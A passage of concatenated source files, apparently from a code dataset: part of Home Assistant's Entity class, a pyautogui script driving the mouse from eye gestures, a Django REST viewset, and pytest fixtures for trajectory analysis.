"""Return True if state updates should be forced.
If True, a state change will be triggered anytime the state property is
updated, not just when the value changes.
"""
return False
@property
def supported_features(self) -> Optional[int]:
"""Flag supported features."""
return None
@property
def context_recent_time(self) -> timedelta:
"""Time that a context is considered recent."""
return timedelta(seconds=5)
@property
def entity_registry_enabled_default(self) -> bool:
"""Return if the entity should be enabled when first added to the entity registry."""
return True
# DO NOT OVERWRITE
# These properties and methods are either managed by Home Assistant or they
# are used to perform a very specific function. Overwriting these may
# produce undesirable effects in the entity's operation.
@property
def enabled(self) -> bool:
"""Return if the entity is enabled in the entity registry.
If an entity is not part of the registry, it cannot be disabled
and will therefore always be enabled.
"""
return self.registry_entry is None or not self.registry_entry.disabled
@callback
def async_set_context(self, context: Context) -> None:
"""Set the context the entity currently operates under."""
self._context = context
self._context_set = dt_util.utcnow()
async def async_update_ha_state(self, force_refresh: bool = False) -> None:
"""Update Home Assistant with current state of entity.
If force_refresh == True will update entity before setting state.
This method must be run in the event loop.
"""
if self.hass is None:
raise RuntimeError(f"Attribute hass is None for {self}")
if self.entity_id is None:
raise NoEntitySpecifiedError(
f"No entity id specified for entity {self.name}"
)
# update entity data
if force_refresh:
try:
await self.async_device_update()
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Update for %s fails", self.entity_id)
return
self._async_write_ha_state()
@callback
def async_write_ha_state(self) -> None:
"""Write the state to the state machine."""
if self.hass is None:
raise RuntimeError(f"Attribute hass is None for {self}")
if self.entity_id is None:
raise NoEntitySpecifiedError(
f"No entity id specified for entity {self.name}"
)
self._async_write_ha_state()
@callback
def _async_write_ha_state(self) -> None:
"""Write the state to the state machine."""
if self.registry_entry and self.registry_entry.disabled_by:
if not self._disabled_reported:
self._disabled_reported = True
assert self.platform is not None
_LOGGER.warning(
"Entity %s is incorrectly being triggered for updates while it is disabled. This is a bug in the %s integration",
self.entity_id,
self.platform.platform_name,
)
return
start = timer()
attr = self.capability_attributes
attr = dict(attr) if attr else {}
if not self.available:
state = STATE_UNAVAILABLE
else:
sstate = self.state
state = STATE_UNKNOWN if sstate is None else str(sstate)
attr.update(self.state_attributes or {})
attr.update(self.device_state_attributes or {})
unit_of_measurement = self.unit_of_measurement
if unit_of_measurement is not None:
attr[ATTR_UNIT_OF_MEASUREMENT] = unit_of_measurement
entry = self.registry_entry
# pylint: disable=consider-using-ternary
name = (entry and entry.name) or self.name
if name is not None:
attr[ATTR_FRIENDLY_NAME] = name
icon = (entry and entry.icon) or self.icon
if icon is not None:
attr[ATTR_ICON] = icon
entity_picture = self.entity_picture
if entity_picture is not None:
attr[ATTR_ENTITY_PICTURE] = entity_picture
assumed_state = self.assumed_state
if assumed_state:
attr[ATTR_ASSUMED_STATE] = assumed_state
supported_features = self.supported_features
if supported_features is not None:
attr[ATTR_SUPPORTED_FEATURES] = supported_features
device_class = self.device_class
if device_class is not None:
attr[ATTR_DEVICE_CLASS] = str(device_class)
end = timer()
if end - start > 0.4 and not self._slow_reported:
self._slow_reported = True
extra = ""
if "custom_components" in type(self).__module__:
extra = "Please report it to the custom component author."
else:
extra = (
"Please create a bug report at "
"https://github.com/home-assistant/core/issues?q=is%3Aopen+is%3Aissue"
)
if self.platform:
extra += (
f"+label%3A%22integration%3A+{self.platform.platform_name}%22"
)
_LOGGER.warning(
"Updating state for %s (%s) took %.3f seconds. %s",
self.entity_id,
type(self),
end - start,
extra,
)
# Overwrite properties that have been set in the config file.
assert self.hass is not None
if DATA_CUSTOMIZE in self.hass.data:
attr.update(self.hass.data[DATA_CUSTOMIZE].get(self.entity_id))
# Convert temperature if we detect one
try:
unit_of_measure = attr.get(ATTR_UNIT_OF_MEASUREMENT)
units = self.hass.config.units
if (
unit_of_measure in (TEMP_CELSIUS, TEMP_FAHRENHEIT)
and unit_of_measure != units.temperature_unit
):
prec = len(state) - state.index(".") - 1 if "." in state else 0
temp = units.temperature(float(state), unit_of_measure)
state = str(round(temp) if prec == 0 else round(temp, prec))
attr[ATTR_UNIT_OF_MEASUREMENT] = units.temperature_unit
except ValueError:
# Could not convert state to float
pass
if (
self._context_set is not None
and dt_util.utcnow() - self._context_set > self.context_recent_time
):
self._context = None
self._context_set = None
self.hass.states.async_set(
self.entity_id, state, attr, self.force_update, self._context
)
def schedule_update_ha_state(self, force_refresh: bool = False) -> None:
"""Schedule an update ha state change task.
Scheduling the update avoids executor deadlocks.
Entity state and attributes are read when the update ha state change
task is executed.
If state is changed more than once before the ha state change task has
been executed, the intermediate state transitions will be missed.
"""
assert self.hass is not None
self.hass.add_job(self.async_update_ha_state(force_refresh)) # type: ignore
@callback
def async_schedule_update_ha_state(self, force_refresh: bool = False) -> None:
"""Schedule an update ha state change task.
This method must be run in the event loop.
Scheduling the update avoids executor deadlocks.
Entity state and attributes are read when the update ha state change
task is executed.
If state is changed more than once before the ha state change task has
been executed, the intermediate state transitions will be missed.
"""
if force_refresh:
assert self.hass is not None
self.hass.async_create_task(self.async_update_ha_state(force_refresh))
else:
self.async_write_ha_state()
async def async_device_update(self, warning: bool = True) -> None:
"""Process 'update' or 'async_update' from entity.
This method is a coroutine.
"""
if self._update_staged:
return
self._update_staged = True
# Process update sequential
if self.parallel_updates:
await self.parallel_updates.acquire()
try:
# pylint: disable=no-member
if hasattr(self, "async_update"):
task = self.hass.async_create_task(self.async_update()) # type: ignore
elif hasattr(self, "update"):
task = self.hass.async_add_executor_job(self.update) # type: ignore
else:
return
if not warning:
await task
return
finished, _ = await asyncio.wait([task], timeout=SLOW_UPDATE_WARNING)
for done in finished:
exc = done.exception()
if exc:
raise exc
return
_LOGGER.warning(
"Update of %s is taking over %s seconds",
self.entity_id,
SLOW_UPDATE_WARNING,
)
await task
finally:
self._update_staged = False
if self.parallel_updates:
self.parallel_updates.release()
@callback
def async_on_remove(self, func: CALLBACK_TYPE) -> None:
"""Add a function to call when entity removed."""
if self._on_remove is None:
self._on_remove = []
self._on_remove.append(func)
async def async_removed_from_registry(self) -> None:
"""Run when entity has been removed from entity registry.
To be extended by integrations.
"""
@callback
def add_to_platform_start(
self,
hass: HomeAssistant,
platform: EntityPlatform,
parallel_updates: Optional[asyncio.Semaphore],
) -> None:
"""Start adding an entity to a platform."""
if self._added:
raise HomeAssistantError(
f"Entity {self.entity_id} cannot be added a second time to an entity platform"
)
self.hass = hass
self.platform = platform
self.parallel_updates = parallel_updates
self._added = True
@callback
def add_to_platform_abort(self) -> None:
"""Abort adding an entity to a platform."""
self.hass = None
self.platform = None
self.parallel_updates = None
self._added = False
async def add_to_platform_finish(self) -> None:
"""Finish adding an entity to a platform."""
await self.async_internal_added_to_hass()
await self.async_added_to_hass()
self.async_write_ha_state()
async def async_remove(self, *, force_remove: bool = False) -> None:
"""Remove entity from Home Assistant.
If the entity has a non disabled entry in the entity registry,
the entity's state will be set to unavailable, in the same way
as when the entity registry is loaded.
If the entity doesn't have a non disabled entry in the entity registry,
or if force_remove=True, its state will be removed.
"""
assert self.hass is not None
if self.platform and not self._added:
raise HomeAssistantError(
f"Entity {self.entity_id} async_remove called twice"
)
self._added = False
if self._on_remove is not None:
while self._on_remove:
self._on_remove.pop()()
await self.async_internal_will_remove_from_hass()
await self.async_will_remove_from_hass()
# Check if entry still exists in entity registry (e.g. unloading config entry)
if (
not force_remove
and self.registry_entry
and not self.registry_entry.disabled
):
# Set the entity's state will to unavailable + ATTR_RESTORED: True
self.registry_entry.write_unavailable_state(self.hass)
else:
self.hass.states.async_remove(self.entity_id, context=self._context)
async def async_added_to_hass(self) -> None:
"""Run when entity about to be added to hass.
To be extended by integrations.
"""
async def async_will_remove_from_hass(self) -> None:
"""Run when entity will be removed from hass.
To be extended by integrations.
"""
async def async_internal_added_to_hass(self) -> None:
"""Run when entity about to be added to hass.
Not to be extended by integrations.
"""
assert self.hass is not None
if self.platform:
info = {"domain": self.platform.platform_name}
if self.platform.config_entry:
info["source"] = SOURCE_CONFIG_ENTRY
info["config_entry"] = self.platform.config_entry.entry_id
else:
info["source"] = SOURCE_PLATFORM_CONFIG
self.hass.data.setdefault(DATA_ENTITY_SOURCE, {})[self.entity_id] = info
if self.registry_entry is not None:
# This is an assert as it should never happen, but helps in tests
assert (
not self.registry_entry.disabled_by
), f"Entity {self.entity_id} is being added while it's disabled"
self.async_on_remove(
async_track_entity_registry_updated_event(
self.hass, self.entity_id, self._async_registry_updated
)
)
async def async_internal_will_remove_from_hass(self) -> None:
"""Run when entity will be removed from hass.
Not to be extended by integrations.
"""
if self.platform:
assert self.hass is not None
self.hass.data[DATA_ENTITY_SOURCE].pop(self.entity_id)
async def _async_registry_updated(self, event: Event) -> None:
"""Handle entity registry update."""
data = event.data
if data["action"] == "remove":
await self.async_removed_from_registry()
self.registry_entry = None
await self.async_remove()
if data["action"] != "update":
return
assert self.hass is not None
ent_reg = await self.hass.helpers.entity_registry.async_get_registry()
old = self.registry_entry
self.registry_entry = ent_reg.async_get(data["entity_id"])
assert self.registry_entry is not None
if self.registry_entry.disabled:
await self.async_remove()
return
assert old is not None
if self.registry_entry.entity_id == old.entity_id:
self.async_write_ha_state()
return
await self.async_remove(force_remove=True)
assert self.platform is not None
self.entity_id = self.registry_entry.entity_id
await self.platform.async_add_entities([self])
def __eq__(self, other: Any) -> bool:
"""Return the comparison."""
if not isinstance(other, self.__class__):
return False
# Can only decide equality if both have a unique id
if self.unique_id is None or other.unique_id is None:
return False
# Ensure they belong to the same platform
if self.platform is not None or other.platform is not None:
if self.platform is None or other.platform is None:
return False
if self.platform.platform != other.platform.platform:
return False
return self.unique_id == other.unique_id
def __repr__(self) -> str:
"""Return the representation."""
return f"<Entity {self.name}: {self.state}>"
async def async_request_call(self, coro: Awaitable) -> None:
"""Process request batched."""
if self.parallel_updates:
await self.parallel_updates.acquire()
try:
await coro
finally:
if self.parallel_updates:
self.parallel_updates.release()
class ToggleEntity(Entity):
"""An abstract class for entities that can be turned on and off."""
@property
def state(self) -> str:
"""Return the state."""
return STATE_ON if self.is_on else STATE_OFF
@property
def is_on(self) -> bool:
"""Return True if entity is on."""
raise NotImplementedError()
def turn_on(self, **kwargs: Any) -> None:
"""Turn the entity on."""
raise NotImplementedError()
async def async_turn_on(self, **kwargs: Any) -> None:
"""Turn the entity on."""
assert self.hass is not None
await self.hass.async_add_executor_job(ft.partial(self.turn_on, **kwargs))
def turn_off(self, **kwargs: Any) -> None:
"""Turn the entity off."""
raise NotImplementedError()
async def async_turn_off(self, **kwargs: Any) -> None:
"""Turn the entity off."""
assert self.hass is not None
await self.hass.async_add_executor_job(ft.partial(self.turn_off, **kwargs))
def toggle(self, **kwargs: Any) -> None:
"""Toggle the entity."""
if self.is_on:
self.turn_off(**kwargs)
else:
self.turn_on(**kwargs)
async def async_toggle(self, **kwargs: Any) -> None:
"""Toggle the entity."""
if self.is_on:
await self.async_turn_off(**kwargs)
else:
await self.async_turn_on(**kwargs)
|
the-stack_106_14902
|
import pyautogui
import sys
pyautogui.FAILSAFE = False
# PARAMETERS FOR MOVE_MOUSE
# coords - coordinates of where the mouse should be relative to eyes -> tuple
# left_click - if the mouse should left click -> boolean -> wink left eye
# right_click - if the mouse should right click -> boolean -> wink right eye
# dbl_click - if the mouse should double click -> boolean -> blink both eyes twice
# shut_down - if the program should be shut down -> boolean -> shut eyes for prolonged time
def move_mouse(coords, left_click, right_click, dbl_click, shut_down):
if shut_down:
sys.exit()
pyautogui.moveTo(coords)
# Executing clicks
if left_click:
pyautogui.click(button="left")
elif right_click:
pyautogui.click(button="right")
elif dbl_click:
pyautogui.doubleClick()
|
the-stack_106_14903
|
# -*- coding: utf-8 -*-
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors: Luc LEGER / Coopérative ARTEFACTS <[email protected]>
from django.db.models.query import QuerySet
from rest_framework import viewsets
from ..models.collection_informer import (
CollectionInformer as CollectionInformerModel)
from ..serializers.collection_informer import CollectionInformerSerializer
class CollectionInformerViewSet(viewsets.ModelViewSet):
"""
CollectionInformer management
"""
queryset = CollectionInformerModel.objects.all()
serializer_class = CollectionInformerSerializer
keycloak_scopes = {
'GET': 'collection_informer:view',
'POST': 'collection_informer:add',
'PATCH': 'collection_informer:update',
'PUT': 'collection_informer:update',
'DELETE': 'collection_informer:delete'
}
def get_queryset(self):
queryset = self.queryset
if isinstance(queryset, QuerySet):
# Ensure queryset is re-evaluated on each request.
queryset = CollectionInformerModel.objects.filter(
collection_id=self.kwargs['collection_pk'])
return queryset
|
the-stack_106_14905
|
import pytest
import tensorflow as tf
import mdtraj as md
@pytest.fixture(scope='session')
def sess():
sess = tf.Session()
yield sess
sess.close()
@pytest.fixture()
def traj():
t = md.load('fs_peptide/trajectory-9.xtc', top='fs_peptide/fs-peptide.pdb', stride=21)
return t
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.